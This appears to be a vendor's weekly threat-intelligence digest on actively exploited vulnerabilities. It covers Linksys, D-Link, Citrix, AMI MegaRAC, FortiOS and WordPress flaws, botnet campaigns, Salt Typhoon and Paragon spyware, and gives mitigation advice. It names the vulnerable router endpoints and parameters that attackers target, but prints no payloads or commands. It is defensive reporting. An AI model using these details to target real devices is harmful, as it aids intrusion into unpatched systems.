This week's cybersecurity landscape witnessed a surge in both opportunistic and advanced threat activity. CISA added three high-impact vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: a path traversal flaw in legacy D-Link DIR-859 routers, a critical authentication bypass in AMI MegaRAC SPx's Redfish Host Interface, and a long-standing hardcoded credentials vulnerability in Fortinet FortiOS previously leveraged by the Akira ransomware group. Several other vulnerabilities are under active exploitation, including a privilege escalation flaw in the Motors WordPress theme, a memory overflow bug in Citrix NetScaler ADC/Gateway, and a zero-auth OS command injection in Linksys E-Series routers.

Simultaneously, botnet-driven exploitation campaigns intensified, with threat actors deploying malware families such as EnemyBot, Sysrv-K, Andoryu, and Androxgh0st to target unpatched vulnerabilities in platforms like GitLab, Cloud Gateway, and various PHP services. IoT botnets including Bashlite, BrickerBot, Tsunami, and Mirai also escalated attacks on Eir D1000 modems, rapidly infecting internet-facing devices.  

On the advanced threat front, state-sponsored and surveillance-driven intrusions made headlines. The Canadian Centre for Cyber Security and the FBI issued a joint advisory linking China-backed Salt Typhoon to ongoing exploitation of a two-year old vulnerability in Cisco IOS XE web UI. Meanwhile, an OS Command Injection Vulnerability in Linksys E-Series routers is actively being exploited by the self-propagating TheMoon worm. Additionally, Meta-owned WhastApp confirmed to SecurityWeek that CVE-2025-27363, an out-of-bounds write flaw in FreeType was tied to spyware activity linked to Israeli firm Paragon.

Current trending vulnerabilities offer insights into the latest emerging and widely discussed threats, helping to make informed decisions.  

‍CVE-2025-4322
An Unauthenticated Privilege Escalation Vulnerability in the popular Motors WordPress theme poses a critical risk to website security, with a CVSS Score of 9.8. Affecting all versions up to and including 5.6.67, this flaw enables remote attackers to reset passwords and gain full administrative access to WordPress sites without authentication. If exploited, threat actors can perform complete site takeovers, deploy malicious plugins or persistent backdoors, and operate with stealth, often leaving minimal forensic evidence unless detailed logging is in place. According to Wordfence, more than 23,100 attack attempts have been blocked by its firewall, highlighting the active exploitation of this vulnerability. To mitigate risk, site administrators are strongly urged to update to version 5.6.68, which contains the official patch.

CVE-2025-6543
A Memory Overflow Vulnerability in the Citrix NetScaler ADC and NetScaler Gateway could lead to unintended control flow and denial of service, with a critical CVSS score of 9.2. This vulnerability has been exploited in the wild, prompting Citrix to release urgent security patches. While the exact exploitation techniques remain undisclosed, Citrix confirmed that attacks on unpatched appliances have been observed. However, successful exploitation requires the appliance to be configured in Gateway mode, including VPN virtual server, ICA Proxy, CVPN, RDP Proxy, or AAA virtual server. Customers are strongly advised to upgrade to the recommended NetScaler builds immediately to mitigate the risk.

CVE-2025-34037
An Unauthenticated OS Command Injection Vulnerability in the Linksys E-Series routers has been rated critical with a CVSS Score of 10.0, allowing remote attackers to execute arbitrary shell commands without any authentication. The flaw resides in the /tmUnblock.cgi and /hndUnblock.cgi CGI endpoints, where input to the ttcp_ip parameter is improperly sanitized, leading to direct command execution on the underlying system. According to the SANS Technology Institute, this vulnerability is being actively exploited and may impact other Linksys models, including the WAG, WAP, WES, WET, WRT series, as well as Wireless-N access points and routers. As of now, no official patch or firmware update has been released by Linksys. Organizations are strongly advised to restrict access to port 8080, implement external firewall rules, and monitor for suspicious network activity indicative of exploitation attempts.

CVE-2024-0769
A Path Traversal Vulnerability has been identified in the D-Link DIR-859 router, specifically within the /hedwig.cgi HTTP POST request handler. The flaw is rated critical with a CVSS Score of 9.8 and affects firmware version 1.06B01. All associated hardware versions have reached End-of-Life (EoL) and are no longer supported. Attackers are actively exploiting the flaw by sending malicious POST requests to /hedwig.cgi, using the fatlady.php file to access sensitive configuration files like getcfg, potentially exposing user credentials. This can allow full device compromise, and the vulnerability has been recently added to CISA’s KEV catalog. D-Link recommends retiring and replacing all affected devices.

CVE-2024-54085
An Authentication Bypass by Spoofing Vulnerability in the AMI MegaRAC SPx Redfish Host Interface has been rated critical with a CVSS Score of 10.0, posing severe risks to system confidentiality, integrity, and availability. AMI released a security advisory in March 2025, addressing the flaw in SPx versions 12.7+ and 13.5. According to Eclypsium, this vulnerability can be exploited by both local and remote attackers via the Redfish management interface or internal host access to the BMC. Successful exploitation enables full remote control of the compromised server, including the ability to deploy malware and conduct firmware tampering. The flaw has been recently added to the CISA's Known Exploited Vulnerabilities (KEV) catalog, highlighting the urgency for immediate remediation.

CVE-2019-6693
A Use of Hard-Coded Credentials Vulnerability has been identified in Fortinet FortiOS, allowing attackers to decrypt sensitive data in configuration backup files by leveraging a known hardcoded key. The issue is rated medium severity on the CVSS Scale and affects FortiOS versions 6.2.0, 6.0.0 to 6.0.6, and 5.6.10 and below. Starting with FortiOS versions 5.6.11, 6.0.7, and 6.2.1, administrators are given the option to use a password to encrypt sensitive configuration data, mitigating the risk.  This vulnerability has been historically exploited by the Akira ransomware group for initial access and was recently added to the CISA KEV catalog, emphasizing the need for immediate upgrades.

Telemetry collected from Loginsoft sensors were analyzed and processed to derive insights on what is actively being exploited and actively being scanned.  As source of truth, source IPv4 addresses & payloads can be provided on need-to-know basis.

Identified vulnerabilities exploited by botnets, including recent CVEs logged in Misp. Presenting the top 5 CVEs with payloads suggestive of botnet activities, like utilizing wget with IP addresses.

We proactively monitor the vulnerabilities which are targeted by adversaries. Each vulnerability is humanly studied and mapped with Mitre ATT&CK tactics and techniques. Source of information is derived from our vulnerability intelligence platform collected and curated information from various sources such as Twitter, Telegram, OSINT groups, Blogs, Data leak Sites and more.

CVE-2023-20198
The Canadian Centre for Cyber Security and FBI have jointly issued a warning about cyberattacks by Chinese state-sponsored group Salt Typhoon, targeting telecommunications companies in Canada. Known for espionage campaigns against major telecom providers globally, Salt Typhoon has reportedly exfiltrated call detail records and sensitive communications of high-value individuals, including government personnel and political figures. The threat actors exploited the vulnerability CVE-2023-20198 to access running configuration files from multiple network devices and, in at least one instance, modified a file to create a GRE tunnel, enabling them to intercept and collect network traffic for surveillance purposes.

CVE-2025-34037
An OS Command Injection Vulnerability in the E-Series Linksys routers is being actively in the wild by a self-replicating malware known as TheMoon worm, according to research from the SANS Technology Institute. The worm primarily displays characteristics of an autonomous propagation threat, though indicators within its binary suggest the potential presence of a command-and-control (C2) mechanism, raising concerns that it could be weaponized into a full-fledged botnet at any time.

CVE-2025-27363
An Out-of-Bounds Write Vulnerability in the FreeType, CVE-2025-27363, has been linked to exploitation by Israeli surveillance vendor Paragon, according to Meta-owned WhatsApp in a statement to Security Week. Initially, flagged in mid-March through a Meta advisory as an out-of-bounds write flaw in the FreeType open-source library, the vulnerability could lead to arbitrary code execution and was suspected to be exploited in the wild. By early May, it was patched in Android and added to the CISA KEV catalog. While no technical details were publicly disclosed at that time, WhatsApp recently confirmed to SecurityWeek that its own researchers had requested the CVE after connecting it to an exploit used by Paragon's Graphite spyware. The Citizen Lab had earlier reported that a WhatsApp zero-day was abused by Paragon through malicious PDF files shared in group chats, which was mitigated via a server-side patch without requiring client-side updates.

It refers to vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts and planning to expand.

1. https://www.cisa.gov/news-events/alerts/2025/06/16/cisa-adds-two-known-exploited-vulnerabilities-catalog  
2. https://www.cisa.gov/news-events/alerts/2025/06/17/cisa-adds-one-known-exploited-vulnerability-catalog
3. https://www.greynoise.io/blog/exploit-attempts-targeting-zyxel-cve-2023-28771
4. https://global.ptsecurity.com/analytics/pt-esc-threat-intelligence/team46-and-taxoff-two-sides-of-the-same-coin
5. https://citizenlab.ca/2025/06/first-forensic-confirmation-of-paragons-ios-mercenary-spyware-finds-journalists-targeted/
6. https://www.trendmicro.com/en_us/research/25/f/langflow-vulnerability-flodric-botnet.html